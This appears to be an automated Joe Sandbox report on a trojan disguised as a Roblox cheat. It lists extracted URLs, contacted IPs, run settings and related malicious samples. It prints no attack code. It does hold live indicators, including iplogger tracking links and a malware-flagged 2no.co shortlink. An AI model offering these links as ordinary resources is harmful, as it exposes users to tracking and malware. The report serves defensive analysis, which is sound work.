                                http://crl.securetrust.com/SGCA.crlrobloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.winimage.com/zLibDll1.2.11rbrroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.firmaprofesional.com/cps0robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://iplogger.org/chromecache_137.12.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerrobloxPX1instaler_48CB5.log.2.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperrobloxPX1instaler_48CB5.log.2.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.securetrust.com/SGCA.crl0robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://client-telemetry.roblox.comHttpPointsReporterUrlBootstrapperWebView2InstallationTelemetryHunroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.securetrust.com/STCA.crl0robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://curl.se/docs/hsts.htmlroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://client-telemetry.roblox.com3robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://tools.medialab.sciences-po.fr/iwanthue/index.phproblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://client-telemetry.roblox.comroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper3robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://counter.yadro.ru/hit?chromecache_137.12.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.quovadisglobal.com/cps0robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlrobloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://2no.co/24RXx6Hcheatinstaler cheatinstalerF6R54T.exe, 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://setup.rbxcdn.comrobloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://iplogger.org/preview/7c00c9b3d049350da3aca75cf5f83229chromecache_137.12.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.dhimyotis.com/certignarootca.crlrobloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://ocsp.accv.esrobloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerbloxrobloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://repository.swisssign.com/robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://iplogger.org/privacy/chromecache_137.12.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.roblox.com/robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.xrampsecurity.com/XGCA.crlrobloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ecsv2.roblox.com/client/pbeTelemetryV2UrlRobloxTelemetrySendByBatchSizeRobloxTelemetryBatchSroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.roblox.comrobloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://curl.se/docs/http-cookies.htmlroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.accv.es/legislacion_c.htm0UrobloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://client-telemetry.roblox.cominatoreyrobloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdn.iplogger.org/redirect/logo-dark.pngchromecache_137.12.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://wwww.certigna.fr/autorites/0mrobloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://ocsp.accv.es0robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrappere:0.0ms)robloxPX1instaler.exe, 00000002.00000003.2349153640.0000000004151000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64probloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://wwww.certigna.fr/autorites/robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperwnloadsrrobloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://curl.se/docs/alt-svc.htmlroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdn.iplogger.org/redirect/brand.pngchromecache_137.12.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ecsv2.roblox.com/client/pbeesrobloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/certroblox cheat.exe, robloxPX1instaler.exe.0.dr, cacert.pem.2.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.quovadisglobal.com/cpsrobloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer(robloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.robloxPX1instaler_48CB5.log.2.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperLMEMXrobloxPX1instaler.exe, 00000002.00000003.2349153640.0000000004151000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.securetrust.com/STCA.crlrobloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerprobloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.roblox.com/_1JrobloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.accv.es/legislacion_c.htmrobloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayeronsrobloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.xrampsecurity.com/XGCA.crl0robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerocalrobloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://iplogger.org/rules/chromecache_137.12.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://bit.ly/1eMQ42Uroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.certigna.fr/certignarootca.crl01robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.cert.fnmt.es/dpcs/robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.winimage.com/zLibDllroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://s3.amazonaws.com/robloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.accv.es00robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://2no.co/chromecache_137.12.drfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/settingsrobloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ecsv2.roblox.com/client/pberoblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://2no.co/redirect-2chromecache_137.12.drfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperaterobloxPX1instaler.exe, 00000002.00000003.2349153640.0000000004151000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                88.212.201.198
                                		counter.yadro.ruRussian Federation
                                		39134UNITEDNETRUfalse
                                18.239.18.85
                                		d2v57ias1m20gl.cloudfront.netUnited States
                                		16509AMAZON-02USfalse
                                128.116.21.3
                                		edge-term4-ams2.roblox.comUnited States
                                		22697ROBLOX-PRODUCTIONUSfalse
                                104.21.79.229
                                		2no.coUnited States
                                		13335CLOUDFLARENETUSfalse
                                239.255.255.250
                                		unknownReserved
                                		unknownunknownfalse
                                142.250.186.132
                                		www.google.comUnited States
                                		15169GOOGLEUSfalse
                                35.190.80.1
                                		a.nel.cloudflare.comUnited States
                                		15169GOOGLEUSfalse
                                104.21.4.208
                                		cdn.iplogger.orgUnited States
                                		13335CLOUDFLARENETUSfalse

                                Private

                                IP
                                192.168.2.7
                                192.168.2.9
                                192.168.2.6
                                192.168.2.10
                                127.0.0.1

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1484380
                                Start date and time:2024-07-30 00:53:33 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 54s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Run name:Run with higher sleep bypass
                                Number of analysed new started processes analysed:20
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:roblox cheat.exe
                                Detection:MAL
                                Classification:mal90.troj.spyw.evad.winEXE@32/23@18/13
                                EGA Information:
                                • Successful, ratio: 66.7%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 142.250.185.174, 142.250.185.163, 142.251.168.84, 34.104.35.123, 192.229.221.95, 142.250.186.35, 23.51.111.252, 142.250.185.206
                                • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientsettingscdn.roblox.com.edgekey.net, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, e7229.f.akamaiedge.net, clients.l.google.com
                                • Execution Graph export aborted for target roblox cheat.exe, PID 1952 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: roblox cheat.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                18:55:09API Interceptor830696x Sleep call for process: robloxPX1instaler.exe modified

                                LLM Input / Output

                                InputOutput
                                URL: https://2no.co/24RXx6 Model: Perplexity: mixtral-8x7b-instruct
                                {"loginform": false,"urgency": false,"captcha": false,"reasons": ["The webpage does not contain a login form, as there are no explicit requests for sensitive information such as passwords, email addresses, usernames, phone numbers, or credit card numbers.","The text does not create a sense of urgency, as there are no phrases that encourage immediate action such as 'Click here to view document' or 'To view secured document click here'.","The webpage does not contain a CAPTCHA or any other anti-robot detection mechanism.","The webpage informs the user about the collection and processing of their data, and provides a link to the privacy policy and terms and conditions."]}
                                Title: Branded Short Domain OCR: *landshake We value your privacy This link was created by the user of URL Shortener Service IPLagger_ By clicking on this link, you can give your consent to the provision ot your personal data, SUCII as IP address, browser type anc operating system and other data, as well as using cookies to IPLogger, as well as to its partners and users. You can learn more about data processing and removing your data in IPLogger Privacy Policy. You can also follow this link without any data being recorded and processed. We value your privacy, that is why we are seeking your consent prior to collecting any Cata. Agree & Continue Ey clicking on "Agree & Continuer you egree with the Privazpolicy. I Terms &. Conditions For continue without consent click here

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                104.21.79.229C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                  lSmb6nDsrC.exeGet hashmaliciousSmokeLoaderBrowse
                                    setup.exeGet hashmaliciousUnknownBrowse
                                      setup.exeGet hashmaliciousUnknownBrowse
                                        Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                            setup.htaGet hashmaliciousRHADAMANTHYSBrowse
                                              setup.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                Blog.zipGet hashmaliciousRHADAMANTHYSBrowse
                                                  file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                    88.212.201.198http://www.puusektori.fiGet hashmaliciousGRQ ScamBrowse
                                                    • counter.yadro.ru/hit;fims2?t38.6;r;s1280*1024*24;uhttp%3A//www.puusektori.fi/;hkuinka%20monta%20opintoviikkoa%20on%20ammatillisen%20perustutkinnon%20laajuus;0.6661644312023942
                                                    njw.exeGet hashmaliciousUnknownBrowse
                                                    • counter.yadro.ru/hit;counter1?r;s1280*1024*32;uhttp%3A//www.all-bearings.narod.ru/secondpage.html;0.5443641556055339
                                                    239.255.255.250https://liupseerio-f45e48.ingress-baronn.ewp.live/wp-content/mu-plugins/dibinan/pages/region.phpGet hashmaliciousUnknownBrowse
                                                      http://metemiskalogio.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                        https://chattts-49f1.beszyrecala.workers.dev/26d0111e-bce1-4044-b6b4-e1=Get hashmaliciousUnknownBrowse
                                                          https://att-net-6cf915.webflow.io/Get hashmaliciousUnknownBrowse
                                                            cheat_roblox.exeGet hashmaliciousXWormBrowse
                                                              http://pub-2fad846527d7473aa1d1ed2a45595d9d.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                http://ipfs.io/ipfs/QmdV2HGdtwWnonRSvaFvw4QTsSJKp6SREdhoc9BgEawLxT/Karyo.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  https://proposaljennycarlys.wordpress.com/Get hashmaliciousUnknownBrowse
                                                                    https://kapitan.co.ke/ch/f/signin.phpGet hashmaliciousUnknownBrowse
                                                                      128.116.21.3Roblox Account Manager.exeGet hashmaliciousUnknownBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        cdn.iplogger.orgcheat_roblox.exeGet hashmaliciousXWormBrowse
                                                                        • 104.21.4.208
                                                                        4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                        • 172.67.132.113
                                                                        4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                        • 104.21.4.208
                                                                        rpeticao_inicial.vbsGet hashmaliciousUnknownBrowse
                                                                        • 172.67.132.113
                                                                        DN0yi6SRZL.exeGet hashmaliciousUnknownBrowse
                                                                        • 148.251.234.83
                                                                        https://maper.infoGet hashmaliciousUnknownBrowse
                                                                        • 148.251.234.83
                                                                        p68hEdbp8M.exeGet hashmaliciousGurcu Stealer, RedLine, VidarBrowse
                                                                        • 148.251.234.83
                                                                        6wXMsDIz1A.exeGet hashmaliciousGurcu Stealer, RedLineBrowse
                                                                        • 148.251.234.83
                                                                        SJv6Gz8cGp.exeGet hashmaliciousRedLine, Typhon LoggerBrowse
                                                                        • 148.251.234.83
                                                                        2no.cocheat_roblox.exeGet hashmaliciousXWormBrowse
                                                                        • 172.67.149.76
                                                                        C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                                                        • 104.21.79.229
                                                                        lSmb6nDsrC.exeGet hashmaliciousSmokeLoaderBrowse
                                                                        • 104.21.79.229
                                                                        setup.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.79.229
                                                                        setup.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.79.229
                                                                        file.exeGet hashmaliciousXenoRATBrowse
                                                                        • 172.67.149.76
                                                                        Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
                                                                        • 104.21.79.229
                                                                        file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                        • 104.21.79.229
                                                                        rpeticao_inicial.vbsGet hashmaliciousUnknownBrowse
                                                                        • 172.67.149.76
                                                                        edge-term4-ams2.roblox.comsolarabootstrapper.exeGet hashmaliciousXWormBrowse
                                                                        • 128.116.21.4
                                                                        cheat_roblox.exeGet hashmaliciousXWormBrowse
                                                                        • 128.116.21.4
                                                                        RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                                        • 128.116.21.4
                                                                        SecuriteInfo.com.Win32.BackdoorX-gen.25355.5373.exeGet hashmaliciousUnknownBrowse
                                                                        • 128.116.21.4
                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                        • 128.116.21.4
                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                        • 128.116.21.3
                                                                        counter.yadro.rucheat_roblox.exeGet hashmaliciousXWormBrowse
                                                                        • 88.212.202.52
                                                                        LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                        • 88.212.201.204
                                                                        LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                        • 88.212.201.204
                                                                        http://ads.livetv799.meGet hashmaliciousUnknownBrowse
                                                                        • 88.212.202.52
                                                                        4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                        • 88.212.201.204
                                                                        4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                        • 88.212.202.52
                                                                        file.exeGet hashmaliciousXenoRATBrowse
                                                                        • 88.212.202.52
                                                                        http://singlelogin.rsGet hashmaliciousUnknownBrowse
                                                                        • 88.212.201.198
                                                                        https://onpagvus.storeGet hashmaliciousHTMLPhisherBrowse
                                                                        • 88.212.201.198

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        UNITEDNETRUcheat_roblox.exeGet hashmaliciousXWormBrowse
                                                                        • 88.212.201.204
                                                                        Universal Radio Programmer.pdfGet hashmaliciousUnknownBrowse
                                                                        • 88.212.201.204
                                                                        LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                        • 88.212.201.204
                                                                        LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                        • 88.212.201.204
                                                                        http://ads.livetv799.meGet hashmaliciousUnknownBrowse
                                                                        • 88.212.202.52
                                                                        4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                        • 88.212.201.204
                                                                        4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                        • 88.212.201.204
                                                                        file.exeGet hashmaliciousXenoRATBrowse
                                                                        • 88.212.202.52
                                                                        http://singlelogin.rsGet hashmaliciousUnknownBrowse
                                                                        • 88.212.202.52
                                                                        AMAZON-02UShttp://metemiskalogio.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                        • 99.86.159.22
                                                                        solarabootstrapper.exeGet hashmaliciousXWormBrowse
                                                                        • 185.166.143.50
                                                                        https://chattts-49f1.beszyrecala.workers.dev/26d0111e-bce1-4044-b6b4-e1=Get hashmaliciousUnknownBrowse
                                                                        • 13.227.219.3
                                                                        https://att-net-6cf915.webflow.io/Get hashmaliciousUnknownBrowse
                                                                        • 13.224.222.32
                                                                        cheat_roblox.exeGet hashmaliciousXWormBrowse
                                                                        • 99.86.4.125
                                                                        http://pub-2fad846527d7473aa1d1ed2a45595d9d.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                        • 52.58.254.253
                                                                        https://proposaljennycarlys.wordpress.com/Get hashmaliciousUnknownBrowse
                                                                        • 13.227.219.11
                                                                        https://kapitan.co.ke/ch/f/signin.phpGet hashmaliciousUnknownBrowse
                                                                        • 18.193.237.78
                                                                        http://pub-1dce8f5133cd41708dc3ec7e6864bb58.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                        • 52.58.254.253
                                                                        ROBLOX-PRODUCTIONUSsolarabootstrapper.exeGet hashmaliciousXWormBrowse
                                                                        • 128.116.21.4
                                                                        cheat_roblox.exeGet hashmaliciousXWormBrowse
                                                                        • 128.116.21.4
                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                        • 128.116.123.3
                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                        • 128.116.123.4
                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                        • 128.116.123.4
                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                        • 128.116.127.3
                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                        • 128.116.119.4
                                                                        RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                                        • 128.116.21.4
                                                                        SecuriteInfo.com.Win32.BackdoorX-gen.25355.5373.exeGet hashmaliciousUnknownBrowse
                                                                        • 128.116.21.4

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        28a2c9bd18a11de089ef85a160da29e4https://liupseerio-f45e48.ingress-baronn.ewp.live/wp-content/mu-plugins/dibinan/pages/region.phpGet hashmaliciousUnknownBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        http://metemiskalogio.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        https://chattts-49f1.beszyrecala.workers.dev/26d0111e-bce1-4044-b6b4-e1=Get hashmaliciousUnknownBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        https://att-net-6cf915.webflow.io/Get hashmaliciousUnknownBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        cheat_roblox.exeGet hashmaliciousXWormBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        http://pub-2fad846527d7473aa1d1ed2a45595d9d.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                        • 184.28.90.27
